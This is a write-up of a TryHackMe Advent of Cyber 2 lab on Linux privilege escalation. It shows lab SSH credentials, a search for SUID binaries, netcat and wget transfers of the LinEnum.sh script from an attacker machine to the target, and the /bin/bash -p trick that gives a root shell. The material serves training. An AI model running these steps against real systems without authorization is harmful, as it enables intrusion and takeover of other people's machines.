Day 11 (Task 16) The Rogue Gnome – Advent of Cyber 2 TryHackMe

Looks like we need to help Elf McEager escalate their privileges.  They have gained access to a machine, but need to escalate to the root user.  There are 2 different options when escalating privileges, horizontal and vertical.  Horizontal let’s you move to another user’s account.  This may allow you to access different documents that your user doesn’t have access to.  Then there is vertical privilege escalation which allows you to give you access to higher privileged accounts, usually an administrator level account.

A neat trick I learned during this day was that you can use echo $0 to tell you what kind of shell you are in.

Let’s log into the machine through ssh.  We will not need to Nmap this machine, because we are performing privilege escalation and are given a low level account.

ssh cmnatic@YOURIPADDRESS

It tells you to use the password aoc2020

Alright, now let’s escalate our privileges.  Let’s run sudo -l to see if we can run any commands as sudo.

We can’t run anything as sudo.  Maybe there is a SUID binary we can abuse.  A SUID binary has the SUID bit set, which alows a binary to run with higher privileges.  This means that maybe we can run a program as root.  There are normal binaries that have to haev the SUID bit set, such as passwd and ping.  There are many more, but some of the binaries can be used to gain a root shell.  A great site is gtfobins, which allows you to see how to use the binary to gain a root shell, or do other things like privileged reading or writing.  (https://gtfobins.github.io/)

To find the SUID binaries, we can use the find command.  This looks for binaries that run as the owner, instead of the user who executes it.

find / -perm -u=s -type f 2>/dev/null

I always run this command on my local Linux machine, to understand what binaries are standard.  We can see that /bin/bash will run as root, so you can run /bin/bash -i and hopefully are a root shell.

It does not seem to give us a root shell, running whoami shows cmnatic still.  Let’s try an enumeration script called LinEnum.sh. (https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh)

Copy the source code and then save it to a file called LinEnum.sh on your attacker machine.

Let’s use netcat to transfer the file. (https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/)

So on the machine we have sshed into (the target) run nc -l -p 1337 > LinEnum.sh

On your attacker machine, in the directory where you saved the file run nc -w 3 TargetIPAddress 1337 < LinEnum.sh

After a few seconds you can see the file netcat connection close, which means it’s finished.  Run an ls to ensure the file is there.

Now we can see that the script is not executable so let’s make it executable by running chmod +x LinEnum.sh.

We can use python on our attacker machine to server up a web server to download files with python2 or python3 .

Python2 – python2 -m SimpleHTTPServer 5555

Python3 – python3 -m http.server 5555

You can set any port you want, which is what the 5555.  Now on the attacker machine run wget http://AttackerMachine:5555/LinEnum.sh

Now we can run the binary by using

./LinEnum.sh

One interesting thing we find is backup files of the passwd and shadow files, but they are only readable/writable by root.  This finds bash having the SUID bit set, so turns out I was on the right path earlier.

Instead of copying the bash binary over to the directory we can just call it with the -p flag like shown on GTFOBINS. This website it great for discovering way to escalate your privilege, read / write files, and download files. I use this every time I am looking for Linux Privilege Escalation. (https://gtfobins.github.io)

So run /bin/bash -p on the target and we see our prompt change from a $ over to a #, showing we are now root.